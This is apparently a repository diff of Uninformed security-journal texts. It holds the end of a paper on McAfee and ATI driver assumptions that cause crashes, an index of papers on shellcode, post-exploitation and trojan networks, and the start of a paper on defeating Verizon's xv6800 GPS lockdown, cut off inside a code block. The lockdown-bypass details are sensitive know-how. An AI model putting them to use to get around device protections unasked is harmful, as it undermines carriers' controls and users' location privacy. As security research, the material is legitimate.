nt!ZwOpenFile+0x11
|
||||
0x80a367b5
|
||||
nt!PspCreateProcess+0x326
|
||||
nt!NtCreateProcessEx+0x7e
|
||||
nt!KiSystemService+0xc4
|
||||
|
||||
After which point nt!ObInsertObject attempts to validate the
|
||||
object's access mask using an invalid SecurityDescriptor:
|
||||
|
||||
kd> k
|
||||
nt!ObpValidateAccessMask+0xb
|
||||
nt!ObInsertObject+0x1c2
|
||||
nt!PspCreateProcess+0x5dc
|
||||
nt!NtCreateProcessEx+0x7e
|
||||
nt!KiSystemService+0xc4
|
||||
kd> r
|
||||
eax=fa7bbb54 ebx=ffa9fc60 ecx=00023994
|
||||
edx=00000000 esi=00000000 edi=ffb83f00
|
||||
eip=8057828e esp=fa7bbb40 ebp=fa7bbbb8
|
||||
iopl=0 nv up ei pl nz na pe nc
|
||||
cs=0008 ss=0010 ds=0023 es=0023
|
||||
fs=0030 gs=0000 efl=00000202
|
||||
nt!ObpValidateAccessMask+0xb:
|
||||
8057828e f6410210
|
||||
test byte ptr [ecx+0x2],0x10 ds:0023:00023996=??
|
||||
|
||||
The method by which this issue was located was by setting a breakpoint on the
|
||||
instruction after the call to nt!ObCreateObject in nt!PspCreateProcess. Once
|
||||
hit, a memory access breakpoint was set on the Flags attribute of the object's
|
||||
header that would break whenever the field was written to. This, in turn, led
|
||||
to the tracking down of the fact that McAfee was acquiring a handle to the
|
||||
process object prior to nt!ObInsertObject being called, which in turn led to
|
||||
the OB_FLAG_CREATE_INFO flag being cleared and the ObjectCreateInfo attribute
|
||||
being invalidated.
|
||||
|
||||
|
||||
2.3) The Solution
|
||||
|
||||
There are two ways that have been identified that could correct this issue.
|
||||
The first, and most plausible, would be for McAfee to modify their driver such
|
||||
that it will refuse to acquire a handle to a process object if the
|
||||
OB_FLAG_CREATE_INFO bit is set in the process' object header Flags attribute. The
|
||||
downside to using this approach is that it requires McAfee to make use of
|
||||
undocumented structures that are intended by Microsoft to be opaque, and for
|
||||
good reason. However, the author is not currently aware of another means by
|
||||
which an object's creation state can be detected using general purpose API
|
||||
routines.
|
||||
|
||||
The second approach, and it's one that should at least result in a bugcheck
within nt!ObInsertObject, would be to check to see if the object's
OB_FLAG_CREATE_INFO bit has been cleared. If it has, an alternate action can be
taken to validate the object's access mask. If it hasn't, the current method
of validating the access mask can be used. At this time, the author cannot say
what the alternate action would be, though it seems plausible that there would
be another means by which an equivalent action could be performed without
relying on the creation information in the object header.
|
||||
|
||||
In the event that neither of these solutions is pursued, it will continue to
be necessary for protagonistic developers to avoid performing actions between
nt!ObCreateObject and nt!ObInsertObject that might result in file operations
being performed from within the new process' context. One of a number of
work-arounds to this problem would be to post file operations off to a system
worker thread that would then inherently run within the context of the System
process rather than the new process.
|
||||
|
||||
|
||||
3) ATI Radeon 9000 Driver Series
|
||||
|
||||
|
||||
3.1) The Assumption
|
||||
|
||||
The ATI Radeon 9000 Driver Series, and likely other ATI driver series, makes
|
||||
assumptions about the location that the RTL_USER_PROCESS_PARAMETERS structure will
|
||||
be mapped at in the address space of a process that attempts to do 3D
|
||||
operations. If the structure is not mapped at the address that is expected,
|
||||
the machine may blue screen depending on the values that exist at the memory
|
||||
location, if any.
|
||||
|
||||
|
||||
3.2) The Problem
|
||||
|
||||
During some experimentation with changing the default address space layout of
processes on NT-based versions of Windows, it was noticed that machines that
were using the ATI Radeon 9000 series drivers would crash if a process
attempted to do 3D operations and the location of the process' parameter
information was changed from the address at which it is normally mapped.
Before proceeding, it is first necessary for the reader to understand the
purpose of the process parameter information structure and how it is
mapped into the process' address space.
|
||||
|
||||
Most programmers are familiar with the API routine kernel32!CreateProcess[A/W].
This routine serves as the primary means by which user-mode applications spawn
new processes. The function itself is robust enough to support a number of
ways in which a new process can be initialized and then executed. Behind the
scenes, CreateProcess performs all of the necessary operations to prepare the
new task for execution. These operations include opening the executable image
file and creating a section object that is then passed to
ntdll!NtCreateProcessEx, which returns a unique process handle on success. If a
handle is obtained, CreateProcess then proceeds to prepare the process for
execution by initializing the process' parameters as well as creating and
initializing the first thread in the process. A more complete analysis of the
way in which CreateProcess operates can be found in David Probert's excellent
analysis of Windows NT's process architecture.
|
||||
|
||||
For the purpose of this document, however, the part that is of most concern is
|
||||
that step in which CreateProcess initializes the new process' parameters. This
|
||||
is accomplished by making a call into kernel32!BasePushProcessParameters which
|
||||
in turn calls into ntdll!RtlCreateProcessParameters. The parameters are
|
||||
initialized within the process that is calling CreateProcess and are then, in
|
||||
turn, copied into the address space of the new process by first allocating
|
||||
storage with ntdll!NtAllocateVirtualMemory and then by copying the memory from
|
||||
the parent process to the child with ntdll!NtWriteVirtualMemory. Due to the
|
||||
fact that this occurs before the new process actually executes any code, the
|
||||
address that the process parameter structure is allocated at is almost
|
||||
guaranteed to be at the same address. This address happens to be 0x00020000.
|
||||
This fact is most likely why ATI made the assumption that the process parameter
|
||||
information would always be at a static address.
|
||||
|
||||
If, however, ntdll!NtAllocateVirtualMemory allocates the process parameter
|
||||
storage at any place other than the static address described above, ATI's
|
||||
driver will attempt to reference a potentially invalid address when it comes
|
||||
time to perform 3D operations. The specific portion of the driver suite that
|
||||
has the error is the ATI3DUAG.DLL kernel-mode graphics driver. Inside this
|
||||
image there is a portion of code that attempts to make reference to the
|
||||
addresses 0x00020038 and 0x0002003C without doing any sort of probing and
|
||||
locking or validation on the region it's requesting. If the region does not
|
||||
exist or contains unexpected data, a blue screen is a sure thing. The actual
|
||||
portion of the driver that makes this assumption can be found below:
|
||||
|
||||
mov [ebp+var_4], eax
mov edx, 20000h <--
mov [ebp+var_24], edx
movzx ecx, word ptr ds:dword_20035+3 <--
shr ecx, 1
mov [ebp+var_28], ecx
lea eax, [ecx-1]
mov [ebp+var_1C], eax
test eax, eax
jbe short loc_227CC
mov ebx, [edx+3Ch] <--
cmp word ptr [ebx+eax*2], '\'
|
||||
|
||||
The lines of interest are marked by ``<--'' indicators pointing to the exact
instructions that result in a reference being made to an address that is
expected to be within a process' parameter information structure. For the sake
of investigation, one might wonder what it is that the driver could be
attempting to reference. To determine that, it is first necessary to dump the
format of the process parameter structure which, as stated previously, is
RTL_USER_PROCESS_PARAMETERS:
|
||||
|
||||
RTL_USER_PROCESS_PARAMETERS:
   +0x000 MaximumLength     : Uint4B
   +0x004 Length            : Uint4B
   +0x008 Flags             : Uint4B
   +0x00c DebugFlags        : Uint4B
   +0x010 ConsoleHandle     : Ptr32 Void
   +0x014 ConsoleFlags      : Uint4B
   +0x018 StandardInput     : Ptr32 Void
   +0x01c StandardOutput    : Ptr32 Void
   +0x020 StandardError     : Ptr32 Void
   +0x024 CurrentDirectory  : _CURDIR
   +0x030 DllPath           : _UNICODE_STRING
   +0x038 ImagePathName     : _UNICODE_STRING
   +0x040 CommandLine       : _UNICODE_STRING
   +0x048 Environment       : Ptr32 Void
   +0x04c StartingX         : Uint4B
   +0x050 StartingY         : Uint4B
   +0x054 CountX            : Uint4B
   +0x058 CountY            : Uint4B
   +0x05c CountCharsX       : Uint4B
   +0x060 CountCharsY       : Uint4B
   +0x064 FillAttribute     : Uint4B
   +0x068 WindowFlags       : Uint4B
   +0x06c ShowWindowFlags   : Uint4B
   +0x070 WindowTitle       : _UNICODE_STRING
   +0x078 DesktopInfo       : _UNICODE_STRING
   +0x080 ShellInfo         : _UNICODE_STRING
   +0x088 RuntimeData       : _UNICODE_STRING
   +0x090 CurrentDirectores : [32] _RTL_DRIVE_LETTER_CURDIR
|
||||
|
||||
To determine the attribute that the driver is attempting to reference, one must
subtract the base address 0x00020000 from each of the referenced addresses.
This produces two offsets: 0x38 and 0x3c. Both of these offsets are within the
ImagePathName attribute which is a UNICODE_STRING. The UNICODE_STRING structure
is defined as:
|
||||
|
||||
UNICODE_STRING:
   +0x000 Length        : Uint2B
   +0x002 MaximumLength : Uint2B
   +0x004 Buffer        : Ptr32 Uint2B
|
||||
|
||||
This would mean that the driver is attempting to reference the path name of the
|
||||
process' executable image. The 0x38 offset is the length of the image path
|
||||
name and the 0x3c is the pointer to the image path name buffer that actually
|
||||
contains the path. The reason that the driver would need to get access to the
|
||||
executable path is outside of the scope of this discussion, but suffice to say
|
||||
that the method on which it is based is an assumption that may not always be
|
||||
safe to make, especially under conditions where the process' parameter
|
||||
information is not mapped at 0x00020000.
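
The offset arithmetic can be double-checked with a small, portable sketch.
The structures below are transcribed from the two dumps above, with 32-bit
pointers modeled as uint32_t so that the layout holds on any host; the type
and function names are illustrative only. The helper mirrors what the visible
portion of the driver's code appears to do (halve the byte length, then walk
backward looking for a backslash), but it takes the buffer as a parameter
rather than reading from a fixed address. The loop itself is inferred from the
handful of instructions shown and is not confirmed driver behavior.

```c
#include <stddef.h>
#include <stdint.h>

/* 32-bit UNICODE_STRING layout from the dump above. */
typedef struct unicode_string32 {
    uint16_t length;         /* +0x000, length in bytes */
    uint16_t maximum_length; /* +0x002 */
    uint32_t buffer;         /* +0x004, Ptr32 to UTF-16 characters */
} unicode_string32;

/* Leading portion of RTL_USER_PROCESS_PARAMETERS, up to ImagePathName. */
typedef struct process_params_prefix32 {
    uint32_t maximum_length;          /* +0x000 */
    uint32_t length;                  /* +0x004 */
    uint32_t flags;                   /* +0x008 */
    uint32_t debug_flags;             /* +0x00c */
    uint32_t console_handle;          /* +0x010 */
    uint32_t console_flags;           /* +0x014 */
    uint32_t standard_input;          /* +0x018 */
    uint32_t standard_output;         /* +0x01c */
    uint32_t standard_error;          /* +0x020 */
    uint8_t  current_directory[12];   /* +0x024, _CURDIR (0xc bytes) */
    unicode_string32 dll_path;        /* +0x030 */
    unicode_string32 image_path_name; /* +0x038 */
} process_params_prefix32;

/* Walks backward from the last character looking for a backslash, as the
 * marked instructions suggest. Returns its index, or -1 if none is found
 * before index 0 is reached. */
long last_backslash_index(const uint16_t *path, uint16_t length_in_bytes)
{
    long i = (long)(length_in_bytes >> 1) - 1; /* shr ecx, 1 / lea eax, [ecx-1] */
    for (; i > 0; --i) {
        if (path[i] == (uint16_t)'\\')
            return i;
    }
    return -1;
}
```

With this layout, the Length field of ImagePathName lands at offset 0x38 and
its Buffer field at 0x3c, matching the two addresses the driver dereferences
when the structure happens to be mapped at 0x00020000.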
|
||||
|
||||
|
||||
3.3) The Solution
|
||||
|
||||
The solution to this problem would be for ATI to come up with an alternate
|
||||
means by which the process' image path name can be obtained. Possibilities for
|
||||
alternate methods include referencing the PEB to obtain the address of the
|
||||
process parameters (by using the ProcessParameters attribute of the PEB). This
|
||||
approach is suboptimal because it requires that ATI attempt to reference fields
|
||||
in a structure that is intended to be opaque and also readily changes between
|
||||
versions of Windows. Another alternate approach, which is perhaps the most
|
||||
feasible, would be to make use of the ProcessImageFileName PROCESSINFOCLASS.
|
||||
This information class can be queried using the NtQueryInformationProcess
|
||||
system call to populate a UNICODE_STRING that contains the full path to the
|
||||
image that is associated with the handle that is supplied to
|
||||
NtQueryInformationProcess. The nice thing about this is that it actually
|
||||
indirectly uses the alternate method from the first proposal, but it does so
|
||||
internally rather than forcing an external vendor to access fields of the PEB.
|
||||
|
||||
Regardless of the actual solution, it seems obvious that assuming that a region
|
||||
of memory will be mapped at a fixed address in every process is something that
|
||||
ATI should not do. There are indeed cases where Windows itself requires
|
||||
certain things to be mapped at the same address between one execution of a
|
||||
process to the next, but it is the opinion of the author that ATI should not
|
||||
assume things that Windows itself does not also assume.
|
||||
|
||||
|
||||
4) Conclusion
|
||||
|
||||
Though this document may appear as an attempt to make specific 3rd party
|
||||
vendors look bad, that is not its intention. In fact, the author acknowledges
|
||||
having been an antagonistic developer in the past. To that point, the author
|
||||
hopes that by providing specific illustrations of where assumptions made by 3rd
|
||||
parties can lead to problems, the reader will be more apt to consider potential
|
||||
conditions that might become problematic if other applications attempt to
|
||||
co-exist with ones that the reader may write in the future.
|
||||
|
||||
|
||||
Bibliography
|
||||
|
||||
Probert, David B. Windows Kernel Internals: Process Architecture.
|
||||
http://www.i.u-tokyo.ac.jp/ss/lecture/new-documents/Lectures/13-Processes/Processes.ppt;
|
||||
accessed April 04, 2005.
|
43
uninformed/1.txt
Normal file
|
@ -0,0 +1,43 @@
|
|||
|
||||
|
||||
Engineering in Reverse
|
||||
Introduction to Reverse Engineering Win32 Applications
|
||||
trew
|
||||
During the course of this paper the reader will be (re)introduced to many concepts and tools essential to understanding and controlling native Win32 applications through the eyes of Windows Debugger (WinDBG). Throughout, WinMine will be utilized as a vehicle to deliver and demonstrate the functionality provided by WinDBG and how this functionality can be harnessed to aid the reader in reverse engineering native Win32 applications. Topics covered include an introductory look at IA-32 assembly, register significance, memory protection, stack usage, various WinDBG commands, call stacks, endianness, and portions of the Windows API. Knowledge gleaned will be used to develop an application designed to reveal and/or remove bombs from the WinMine playing grid.
|
||||
code.tgz | pdf | html | txt
|
||||
|
||||
Exploitation Technology
|
||||
Post-Exploitation on Windows using ActiveX Controls
|
||||
skape
|
||||
When exploiting software vulnerabilities it is sometimes impossible to build direct communication channels between a target machine and an attacker's machine due to restrictive outbound filters that may be in place on the target machine's network. Bypassing these filters involves creating a post-exploitation payload that is capable of masquerading as normal user traffic from within the context of a trusted process. One method of accomplishing this is to create a payload that enables ActiveX controls by modifying Internet Explorer's zone restrictions. With ActiveX controls enabled, the payload can then launch a hidden instance of Internet Explorer that is pointed at a URL with an embedded ActiveX control. The end result is the ability for an attacker to run custom code in the form of a DLL on a target machine by using a trusted process that uses one or more trusted communication protocols, such as HTTP or DNS.
|
||||
pdf | html | txt
|
||||
|
||||
General Research
|
||||
Smart Parking Meters
|
||||
h1kari
|
||||
Security through obscurity is unfortunately much more common than people think: many interfaces are built on the premise that since they are a "closed system" they can ignore standard security practices. This paper will demonstrate how parking meter smart cards implement their protocol and will point out some weaknesses in their design that open the doors to the system. It will also present schematics and code that you can use to perform these basic techniques for auditing almost any type of blackbox secure memory card.
|
||||
html | txt
|
||||
|
||||
General Security
|
||||
Loop Detection
|
||||
Peter Silberman
|
||||
During the course of this paper the reader will gain new knowledge about previous and new research on the subject of loop detection. The topic of loop detection will be applied to the field of binary analysis and a case study will be given to illustrate its uses. All of the implementations provided in this document have been written in C/C++ using Interactive Disassembler (IDA) plug-ins.
|
||||
code.tgz | pdf | html | txt
|
||||
|
||||
Social Zombies: Aspects of Trojan Networks
|
||||
warlord
|
||||
Malicious code is so common in today's Internet that it seems impossible for an average user to keep his or her system clean. It's estimated that several hundred thousand machines are infected by trojans to be abused in a variety of ways, including the theft of money and confidential data as well as extortion, spam, and a whole plethora of further ways. Most often the infected hosts are linked into simple botnets to provide an easy way for the botnet manager to command his zombie army. This article describes ways to form far more effective networks than the ones in use today by the means of stealth, deception, and cryptography.
|
||||
pdf | html | txt
|
||||
|
||||
Machine Speak
|
||||
Mac OS X PPC Shellcode Tricks
|
||||
H D Moore
|
||||
Developing shellcode for Mac OS X is not particularly difficult, but there are a number of tips and techniques that can make the process easier and more effective. The independent data and instruction caches of the PowerPC processor can cause a variety of problems with exploit and shellcode development. The common practice of patching opcodes at run-time is much more involved when the instruction cache is in incoherent mode. NULL-free shellcode can be improved by taking advantage of index registers and the reserved bits found in many opcodes, saving space otherwise taken by standard NULL evasion techniques. The Mac OS X operating system introduces a few challenges to unsuspecting developers; system calls change their return address based on whether they succeed and oddities in the Darwin kernel can prevent standard execve() shellcode from working properly with a threaded process. The virtual memory layout on Mac OS X can be abused to overcome instruction cache obstacles and develop even smaller shellcode.
|
||||
pdf | html | txt
|
||||
|
||||
What Were They Thinking?
|
||||
Annoyances Caused by Unsafe Assumptions
|
||||
skape
|
||||
This installment of What Were They Thinking illustrates some of the annoyances that can be caused when developing software that has to inter-operate with third-party applications. Two such cases will be dissected and discussed in detail for the purpose of showing how third-party applications can fail when used in conjunction with software that performs certain tasks. The analysis of the two cases is meant to show how complex failure conditions can be analyzed and used to determine inter-operability problems.
|
||||
pdf | html | txt
|
||||
|
929
uninformed/10.1.txt
Normal file
|
@ -0,0 +1,929 @@
|
|||
Can you find me now? - Unlocking the Verizon Wireless xv6800 (HTC Titan) GPS
|
||||
10/2008
|
||||
Skywing
|
||||
skywing_uninformed@valhallalegends.com
|
||||
|
||||
0. Abstract
|
||||
|
||||
In August 2008 Verizon Wireless released a firmware upgrade for their xv6800
(rebranded HTC Titan) line of Windows Mobile smartphones that provided a number
of new features previously unavailable on the device with the initial release
firmware. In particular, support for accessing the device's built-in Qualcomm
gpsOne assisted GPS chipset was introduced with this update. However, Verizon
Wireless elected to attempt to lock down the GPS hardware on the xv6800 such
that only applications authorized by Verizon Wireless would be able to access
the device's built-in GPS hardware and perform location-based functions (such
as GPS-assisted navigation). The mechanism used to lock down the GPS hardware
is entirely client-side based, however, and as such suffers from fundamental
limitations in terms of how effective the lockdown can be in the face of an
almost fully user-programmable Windows Mobile-based device. This article
outlines the basic philosophy used to prevent unauthorized applications from
accessing the GPS hardware and provides a discussion of several of the flaws
inherent in the chosen design of the protection mechanism. In addition,
several pitfalls relating to debugging and reverse engineering programs on
Windows Mobile are discussed. Finally, an overview is presented of several
suggested design alterations that would have mitigated some of the flaws in
the current GPS lockdown system from the perspective of safeguarding the
privacy of user location data.
|
||||
|
||||
1. Introduction
|
||||
|
||||
The Verizon Wireless xv6800 (which is in and of itself a rebranded version of
|
||||
the HTC Titan, with a carrier-customized firmware loadout) is a recently
|
||||
released Windows Mobile-based smartphone. A firmware update released during
|
||||
August 2008 enabled several new features on the device. For the purposes of
|
||||
this article, the author has elected to focus on the embedded Qualcomm gpsOne
|
||||
chipset, which provides assisted GPS facilities to applications running on the
|
||||
device.
|
||||
|
||||
With the official firmware upgrade (known as MR1), the assisted GPS support on
|
||||
the device, which had previously remained inaccessible when using carrier-
|
||||
supported firmware, was activated, albeit with a catch; only applications that
|
||||
were approved by Verizon Wireless were able to access the built-in GPS hardware
|
||||
present on the device. Although third-party applications could access an
|
||||
externally connected (for example, Bluetooth-enabled) GPS device, the Qualcomm
|
||||
gpsOne chipset embedded in the phone itself remained inaccessible. Coinciding
|
||||
with the public release of the xv6800 MR1 firmware, Verizon Wireless also began
|
||||
making available a subscription-based application (called "VZ Navigator"),
|
||||
which provides voice-based turn-by-turn navigation on the xv6800 via the usage
|
||||
of the device's built-in GPS hardware.
|
||||
|
||||
There have been a variety of third-party firmware images released for the
|
||||
xv6800 that mix-and-match portions of official firmware releases from other
|
||||
carriers supporting their own rebranded versions of xv6800 (HTC Titan). Some
|
||||
of these custom firmware images enable access to the gpsOne hardware, albeit
|
||||
with several caveats. In particular, until recently, assisted GPS mode, wherein
|
||||
the cellular network aids the device in acquiring a GPS fix, was not available
|
||||
on Verizon Wireless's network with custom firmware images; only standalone GPS
|
||||
mode (which requires waiting for a "cold lock" on three GPS satellites, a
|
||||
process that may take many minutes after device boot) was enabled. In
|
||||
addition, installing these custom firmware images requires patching out a
|
||||
signature check in the software loader on the device. This procedure may be
|
||||
considered dangerous if one wishes to retain hardware warranty support (which
|
||||
may be desirable, given the steep unsubsidized cost of the device).
|
||||
|
||||
Furthermore, should one install the official Verizon Wireless MR1 firmware
upgrade, the gpsOne hardware on the device would remain locked down even if one
switched to one of the currently available third-party firmware images. This
is likely due to a sticky setting written to the firmware during the carrier
provisioning process at the completion of the MR1 firmware upgrade. As the
presently available third-party ROM images do not wipe the area of the device's
firmware which seems to control the GPS hardware's lockdown state, it becomes
difficult to unlock the GPS hardware after having upgraded to the MR1 firmware
image. A lengthy process is available to undo this change, but it involves
the complete reset of most provisioning settings on the device, such that the
phone must be partially manually reprovisioned, as opposed to utilizing the
over-the-air provisioning support.
|
||||
|
||||
Given the downsides of relying on custom firmware images for enabling the
|
||||
built-in GPS hardware on the xv6800, the official firmware release does pose a
|
||||
reasonable attraction. However, the locking down of the GPS hardware to only
|
||||
Verizon Wireless authorized applications is undesirable should one wish to use
|
||||
third-party location-enabled applications with the built-in GPS hardware, such
|
||||
as Google Maps or Microsoft's Live Search.
|
||||
|
||||
Verizon Wireless indicates that third-party application usage of the GPS
hardware on their devices is subject to Verizon Wireless-dictated policies and
procedures [1]. In particular, the security of user location information is
often cited [2] as a reason for requiring location-enabled applications to be
certified by Verizon Wireless. Unfortunately, the mechanism deployed to lock
down the built-in GPS hardware on the xv6800 provides very little in the way of
true security against third-party programs (malicious or otherwise) accessing
location information. In fact, given Windows Mobile 6's lack of "hard" process
isolation, it is questionable as to whether it is even technically feasible to
provide a truly secure protection mechanism on a device that allows
user-supplied programs to be loaded and executed.
|
||||
|
||||
While there may be golden intentions in attempting to protect users from
malicious programs designed to harvest their location information on-the-fly,
the protection system as implemented to control access to the gpsOne chipset
on the xv6800 is unfortunately relatively weak. This is at odds with Verizon
Wireless's stated goals of attempting to protect the security of a user's
location information, and thus may place users at risk.
|
||||
|
||||
2. Overview of Protection Mechanisms
|
||||
|
||||
There are multiple levels of protection mechanisms built into both the MR1
firmware image for the xv6800 and the GPS-enabled subscription VZ
Navigator software that Verizon Wireless supports as the sole officially
sanctioned location-based application (at the time of this article's writing).
The protection mechanisms can be broken up into those that exist on the device
firmware itself, and those that exist in the VZ Navigator software.
|
||||
|
||||
2.1. Firmware-based Protection Mechanisms
|
||||
|
||||
The MR1 firmware provides the underlying foundation of the built-in GPS
hardware lockdown logic. There are several built-in software components that
are "baked into" the firmware image and support the GPS lockdown system. The
principal design underpinning the firmware-based protection system, however, is
a fairly run of the mill security-through-obscurity based approach. In
particular, GPS location information obtained by the built-in gpsOne hardware
(specifically, latitude and longitude) is encrypted. Only programs that
understand how to decrypt the position information are able to make sense of
any data returned by the gpsOne chipset.
|
||||
|
||||
Furthermore, in order to initiate a location fix via the built-in gpsOne
hardware, an application must continually and correctly answer a series of
challenge-response interactions with the gpsOne chipset driver (and thus the
radio firmware on the device). The reason for implementing both a
challenge-response mechanism as well as obfuscating the actual GPS location
will become apparent after further discussion.
|
||||
|
||||
The firmware-based protected gpsOne interface has several constituent layers,
|
||||
with supporting code present at radio-firmware level, kernel driver level, and
|
||||
user mode application level.
|
||||
|
||||
At the lowest level, the radio firmware for the device chipset would appear to
have a hand in obfuscating returned GPS positioning data. This assumption is
based on a strings dump of radio firmware images indicating the presence of
AES-related calls in GPS-related code (AES is used to encrypt the returned
location information), and on the fact that switching to a custom firmware
image after installing the MR1 update does not re-enable the plaintext gpsOne
interface.
|
||||
|
||||
Between the radio firmware (which executes outside the context of Windows
|
||||
Mobile) and the OS itself, there exists a kernel mode Windows Mobile driver
|
||||
known as the GPS intermediate driver. This module (gpsid_qct.dll) provides an
|
||||
interface between user mode callers and the GPS hardware on the device. It
|
||||
also provides support for multiplexing a single piece of GPS hardware across
|
||||
multiple user mode applications concurrently (a standard feature of Windows
|
||||
Mobile's GPS support). However, Verizon Wireless has broken this support with
|
||||
the locked down GPS logic that has been placed in the xv6800's implementation
|
||||
of the GPS intermediate driver.
|
||||
|
||||
Beneath the GPS intermediate driver, there are two different interfaces that
|
||||
are supported for the collection of location data on Windows Mobile-based
|
||||
devices [4]. The first of these is an emulated serial port that is exposed to
|
||||
user mode, and implements a standard NMEA-compatible text-based interface for
|
||||
accessing location information. This interface has also been broken by the
|
||||
GPS intermediate driver used by Verizon Wireless on the xv6800, for reasons
|
||||
that will become clear upon further discussion.
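
For readers unfamiliar with the text-based interface, each NMEA sentence
read from the emulated serial port is framed as "$...*hh", where hh is a
two-digit hexadecimal checksum formed by XORing every character between the
'$' and the '*'. The following is a minimal sketch of that framing check only;
the function name is illustrative, and nothing here is specific to the xv6800
or to the GPS intermediate driver.

```c
#include <stddef.h>
#include <stdint.h>

/* Computes the NMEA checksum: the XOR of every character strictly between
 * the leading '$' and the '*' delimiter. Returns -1 if the sentence is not
 * framed as "$...*". */
int nmea_checksum(const char *sentence)
{
    if (sentence == NULL || sentence[0] != '$')
        return -1;

    uint8_t sum = 0;
    const char *p = sentence + 1;
    while (*p != '\0' && *p != '*')
        sum ^= (uint8_t)*p++;

    return (*p == '*') ? (int)sum : -1;
}
```

A consumer of the serial interface would compare this value against the two
hexadecimal digits that follow the '*' before trusting the sentence's fields.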
|
||||
|
||||
The second interface for retrieving location information via the GPS
|
||||
intermediate driver is a set of IOCTLs implemented by the GPS intermediate
|
||||
driver to retrieve parsed (binary) GPS data from the currently-active GPS
|
||||
hardware (returned as C-style structures). User mode callers do not typically
|
||||
call these IOCTLs directly from their code, but instead indirect through a set
|
||||
of thin C API wrappers in a system-supplied module called gpsapi.dll. This
|
||||
interface is also broken by the GPS lockdown logic in the GPS intermediate
|
||||
driver, although an extended version of this IOCTL-based interface is used by
|
||||
GPS-enabled applications that support the locked down mode of operation on the
|
||||
xv6800.
|
||||
|
||||
Verizon Wireless ships a custom module parallel to gpsapi.dll on the xv6800,
|
||||
named oemgpsOne.dll. This module exports a superset of the APIs provided by
|
||||
the standard gpsapi.dll (although there are slight differences in function
|
||||
names). Additionally, new APIs (which are, as in gpsapi.dll, simply thin
|
||||
wrappers around IOCTL requests sent to the GPS intermediate driver) are
|
||||
provided to manage the challenge-response and encrypted GPS location aspects
|
||||
of the gpsOne lockdown system present on the xv6800. Through correct usage of
|
||||
the APIs exported by oemgpsOne.dll, a program with knowledge of the GPS lock
|
||||
down system can retrieve valid positioning data from the gpsOne chipset on the
|
||||
device.
|
||||
|
||||
Applications that are approved by Verizon Wireless for location-enabled
|
||||
operation make calls to a library developed by Verizon Wireless and Autodesk,
|
||||
named LBSDriver.dll, which is itself a client of oemgpsOne.dll. LBSDriver.dll
|
||||
and its security measures are discussed later, along with VZ Navigator.
|
||||
|
||||
2.1.a. Application Authorization via Challenge-response
|
||||
|
||||
In order to activate the gpsOne hardware on the xv6800 and request a GPS
|
||||
location fix, an application must receive a challenge data block from the
|
||||
gpsOne driver and perform a secret transform on the given data in order to
|
||||
create a well-formed response. Until this process is completed, the gpsOne
|
||||
hardware will not attempt to return a location fix. Furthermore, a
|
||||
location-enabled application using the built-in gpsOne hardware must
|
||||
continually complete additional challenge-response sequences (using the same
|
||||
underlying algorithms) as it continues to acquire updated location fixes from
|
||||
the gpsOne hardware.
|
||||
|
||||
The first step in connecting to the GPS intermediate driver to retrieve valid
|
||||
position information is to open a handle to a GPS intermediate driver instance.
|
||||
This is accomplished with a call to an oemgpsOne.dll export by the name of
|
||||
oGPSOpenDevice. The parameters and return value of this function are analogous
|
||||
to the standard Windows Mobile GPSOpenDevice routine [5].
|
||||
|
||||
HANDLE
oGPSOpenDevice(
   __in HANDLE NewLocationData,
   __in HANDLE DeviceStateChange,
   __in const WCHAR *DeviceName,
   __in DWORD Flags
   );
|
||||
|
||||
After a handle to the GPS intermediate driver instance is available, the next
|
||||
step in preparing for the challenge-response sequence is to issue a call to
|
||||
a second function implemented by oemgpsOne.dll, named oGPSGetBaseSSD.
|
||||
This routine returns a session-specific blob of data that is later used in the
|
||||
challenge-response process. In the current implementation, the returned blob
|
||||
appears to always contain the same data across every invocation.
|
||||
|
||||
DWORD
oGPSGetBaseSSD(
   __in HANDLE Device,
   __out unsigned char *Buf, // sizeof = 0x10
   __out unsigned long *BufLength, // 0x10
   __out unsigned short *Buf2 // sizeof = 0x10
   );
|
||||
|
||||
Next, the GPS intermediate driver must be provided with a valid event handle to
|
||||
signal when a new challenge cycle has been requested by the driver. This is
|
||||
accomplished via a call to the oGPSEnableSecurity function in oemgpsOne.dll.
|
||||
|
||||
DWORD
oGPSEnableSecurity(
   __in HANDLE Device,
   __in HANDLE SecurityChangeEvent
   );
|
||||
|
||||
After the session-specific blob has been retrieved, and an event handle for
|
||||
new challenge requests has been provided to the GPS intermediate driver, the
|
||||
next step is to receive a challenge block from the GPS intermediate driver and
|
||||
compute a valid response. The application must wait until the GPS intermediate
|
||||
driver signals the challenge request event before requesting the current
|
||||
challenge data block. Once the driver signals the event that was passed to
|
||||
oGPSEnableSecurity, the application must execute one challenge-response cycle.
|
||||
|
||||
Challenge data blocks are retrieved from the gpsOne driver via a call to a
|
||||
routine exported from oemgpsOne.dll, named oGPSReadSecurityConfig. As per the
|
||||
prototype, this routine takes a handle to the GPS intermediate driver instance,
|
||||
and returns a blob of data used to generate a challenge response.
|
||||
|
||||
DWORD
|
||||
oGPSReadSecurityConfig(
|
||||
__in HANDLE Device,
|
||||
__out unsigned char *Buf // On return, 0x4 + 1 + 1 + Buf[0x6] (max length 0x1c total)
|
||||
);
|
||||
|
||||
After the challenge data blob has been retrieved via a call to
|
||||
oGPSReadSecurityConfig, the GPS lockdown-aware application must perform a
|
||||
series of secret transformations on it before indicating a companion response
|
||||
blob down to the GPS intermediate driver. The transformation function consists
|
||||
of some bit-shuffling of the challenge blob, followed by a SHA-1 hash of the
|
||||
shuffled challenge blob concatenated with the session-specific data blob. This
|
||||
process yields the bulk of the response data less a two-byte header that is
|
||||
prepended prior to indication down to the GPS intermediate driver.
|
||||
|
||||
The process of sending the computed challenge-response is accomplished via a
|
||||
call to another function in oemgpsOne.dll, by the name of
|
||||
oGPSWriteSecurityConfig.
|
||||
|
||||
DWORD
|
||||
oGPSWriteSecurityConfig(
|
||||
__in HANDLE Device,
|
||||
__in unsigned char *Buf // 0x1C
|
||||
);
|
||||
|
||||
The GPS intermediate driver will continue to periodically challenge the
|
||||
application while it requests updated position fixes from the gpsOne chipset.
|
||||
This is accomplished by signaling the event passed to oGPSEnableSecurity, which
|
||||
indicates to the application that it should retrieve a new challenge and create
|
||||
a new response, using the mechanism outlined above.
|
||||
|
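The wait, read, transform, and write cycle described in this section can be
sketched in portable C as follows. This is only an illustration under stated
assumptions: the gps_ops callback table is a hypothetical stand-in for the
oemgpsOne.dll exports, the buffer sizes are taken from the prototype comments
above, placeholder_transform is NOT the real bit-shuffle and SHA-1 step (which
is not reproduced here), and the fake_* routines merely simulate a driver so
that the loop can be exercised off-device.

```c
#include <string.h>

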